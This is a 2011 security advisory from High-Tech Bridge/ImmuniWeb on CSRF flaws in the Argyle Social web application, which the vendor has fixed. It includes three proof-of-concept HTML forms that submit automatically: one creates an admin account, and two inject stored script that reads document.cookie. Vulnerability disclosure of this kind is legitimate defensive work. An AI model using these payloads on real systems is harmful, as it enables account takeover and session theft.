Total Tests:

Cross-site Request Forgery (CSRF) Vulnerabilities in Argyle Social

Advisory ID:HTB22978
Product:Argyle Social
Vendor:Argyle Social
Vulnerable Versions:Current at 26/04/2011 and probably prior
Tested Version:Current at 26/04/2011
Advisory Publication:April 28, 2011 [without technical details]
Vendor Notification:April 28, 2011
Public Disclosure:May 12, 2011
Latest Update:May 15, 2011
Vulnerability Type:Cross-Site Request Forgery [CWE-352]
Risk Level:Medium
CVSSv2 Base Score:5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Argyle Social which could be exploited to perform cross-site request forgery attacks.

1) Cross-site request forgery (CSRF) vulnerabilities in Argyle Social
1.1 The vulnerability exists due to insufficient validation of the request origin in users/create/ script. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change administrator`s credentials.
Exploitation example:
<form action="http://app.argylesocial.com/users/create/" method="post" name="main">
<input type="hidden" name="name" value="test">
<input type="hidden" name="email" value="email@example.com">
<input type="hidden" name="code" value="usercode">
<input type="hidden" name="role" value="admin">
</form>
<script>
document.main.submit();
</script>

1.2 The vulnerability exists due to insufficient validation of the request origin in settings-ajax/stream_filter_rules/create script. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and modify rules. Due to insufficient sanitation of input data in the "terms" parameter it is also possible to store and execute arbitrary HTML and script code in user`s browser in context of vulnerable website.
Exploitation example:
<form action="http://app.argylesocial.com/settings-ajax/stream_filter_rules/create " method="post" name="main">
<input type="hidden" name="stream_filter_rule" value='{"name":"rulename","id":"","flags":["flagged"],"networks":null,"user_ id":"0","terms":"XSS\">< script>alert(document.cookie)</script>"}'>
</form>
<script>
document.main .submit();
</script>

1.3 The vulnerability exists due to insufficient validation of the request origin in publish-ajax/efforts/create script. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and modify rules. Due to insufficient sanitation of input data in the "title" parameter it is also possible to store and execute arbitrary HTML and script code in user`s browser in context of vulnerable website.
Exploitation example:
<form action="http://app.argylesocial.com/publish-ajax/efforts/create" method="post" name="main">
<input type="hidden" name="effort" value='{"effort_id":"","title":"ptitle2\"><script>alert(document.cookie)</sc ript>","url":"http://www .google.com","short":null,"campaigns":[],"primary_campaign":null,"flights":[ {"glass_id":"post0","fli ght_id":null,"mdk":false,"source":"web interface","content_type":"twitter-status","content":{"content":"hello"},"st ime":"4/30/2011 23:10:00","networks":[{"id":"1","name":"My Name","type":"twitter","url":"","avatar":"http://a2.twimg.com/profile_images /1124040897/at-twitter_r easonably_small.png"}],"waparams":{"pname":null}}]}'>
</form>
<script>
document.main.submit();
</script>

How to Detect Cross-Site Request Forgery Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Fixed by Vendor


References:
[1] High-Tech Bridge Advisory HTB22978 - https://www.immuniweb.com/advisory/HTB22978 - Cross-site Request Forgery (CSRF) Vulnerabilities in Argyle Social
[2] Argyle Social - argylesocial.com- Argyle Social is on a mission to help marketers drive meaningful business outcomes through social media marketing.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
Your data will stay private and confidential